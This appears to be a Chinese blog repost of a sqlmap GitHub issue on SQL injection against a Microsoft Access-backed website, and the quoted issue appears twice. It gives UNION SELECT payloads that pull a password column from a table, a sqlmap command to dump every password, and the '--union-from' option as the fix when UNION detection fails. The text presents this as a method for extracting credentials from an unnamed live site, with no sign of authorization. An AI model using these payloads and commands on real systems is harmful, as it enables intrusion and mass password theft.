本文介绍了如何使用sqlmap工具针对Microsoft Access数据库进行SQL注入攻击。通过示例展示了如何获取特定表中数据,以及在sqlmap未能直接执行UNION查询注入时,如何通过指定--union-from参数来强制使用已知表名,从而有效利用工具进行数据提取。
[url]https://github.com/sqlmapproject/sqlmap/issues/423[/url]
[quote]
Valid statements that show the numbers in the resulting html page:
...&id=123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
...&id=123 union select top 1 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
- - foobar is an existing table (gathered via error messages in html)
- - password is a valid column in the foobar table
The following URL gives you one password:
...&id=123 union select top 1 1,2,3,4,5,6,password,8,9,10,11,12,13
from foobar
Now I wanted to hand over to sqlmap to dump all passwords:
sqlmap -u <url> -p id --dbms="Microsoft Access" -T foobar -C password
- --dump
which did not work out (0 entries retrieved), but it was confirmed
that the table has several hundred entries.
- - sqlmap was able to detect the number of columns is 13 (correct)
- - sqlmap confirmed a bolean-based blind sqli vulnerability (but no
UNION based sqli)
- - sqlmap was able to confirm the existence of table name (with --tables)
(echo foobar > txt/common-tables.txt)
- - sqlmap was able to confirm the existence of column name password
(with --colums)
When running something like:
- --technique=U --union-cols=13 --union-char=1
sqlmap requested something *like*:
...id=-123 union all select
1,2,3,4,5,6,CHR(58)&CHR(111)&CHR(58),8,9,10,11,12,13 from
MSysAccessObjects%00
which results in the following error message (shown in the html page):
The Microsoft Jet database engine cannot find the input table or query
'MSysAccessObjects'. Make sure it exists and that its name is spelled
correctly.
[color=blue]So if sqlmap would accept a known tablename on the command line that
it would use to detect/confirm the union based sqli vuln, instead of
using "MSysAccessObjects" this would make sqlmap more useful
(or simply use the table name specified in -T or previously
bruteforced to detect union-based sqli).[/color]
[/quote]
solution:
[color=red][b][quote]Now, in your case, you can (e.g.) use --union-from=foobar which will enforce usage of table name foobar in UNION query injection payloads[/quote][/b][/color]
[quote]
Valid statements that show the numbers in the resulting html page:
...&id=123 union all select 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
...&id=123 union select top 1 1,2,3,4,5,6,7,8,9,10,11,12,13 from foobar
- - foobar is an existing table (gathered via error messages in html)
- - password is a valid column in the foobar table
The following URL gives you one password:
...&id=123 union select top 1 1,2,3,4,5,6,password,8,9,10,11,12,13
from foobar
Now I wanted to hand over to sqlmap to dump all passwords:
sqlmap -u <url> -p id --dbms="Microsoft Access" -T foobar -C password
- --dump
which did not work out (0 entries retrieved), but it was confirmed
that the table has several hundred entries.
- - sqlmap was able to detect the number of columns is 13 (correct)
- - sqlmap confirmed a bolean-based blind sqli vulnerability (but no
UNION based sqli)
- - sqlmap was able to confirm the existence of table name (with --tables)
(echo foobar > txt/common-tables.txt)
- - sqlmap was able to confirm the existence of column name password
(with --colums)
When running something like:
- --technique=U --union-cols=13 --union-char=1
sqlmap requested something *like*:
...id=-123 union all select
1,2,3,4,5,6,CHR(58)&CHR(111)&CHR(58),8,9,10,11,12,13 from
MSysAccessObjects%00
which results in the following error message (shown in the html page):
The Microsoft Jet database engine cannot find the input table or query
'MSysAccessObjects'. Make sure it exists and that its name is spelled
correctly.
[color=blue]So if sqlmap would accept a known tablename on the command line that
it would use to detect/confirm the union based sqli vuln, instead of
using "MSysAccessObjects" this would make sqlmap more useful
(or simply use the table name specified in -T or previously
bruteforced to detect union-based sqli).[/color]
[/quote]
solution:
[color=red][b][quote]Now, in your case, you can (e.g.) use --union-from=foobar which will enforce usage of table name foobar in UNION query injection payloads[/quote][/b][/color]
扫一扫
806
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
